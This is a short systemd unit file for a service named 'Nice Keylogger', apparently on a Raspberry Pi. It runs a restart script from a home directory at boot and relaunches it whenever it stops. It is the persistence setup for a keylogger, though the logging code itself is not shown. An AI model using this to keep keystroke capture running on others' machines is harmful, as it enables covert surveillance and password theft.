[Unit]
Description=Nice Keylogger
After=network.target

[Service]
Type=simple
Restart=always
RestartSec=1
ExecStart=/bin/bash /home/pi/nicekl/restart.sh

[Install]
WantedBy=multi-user.target
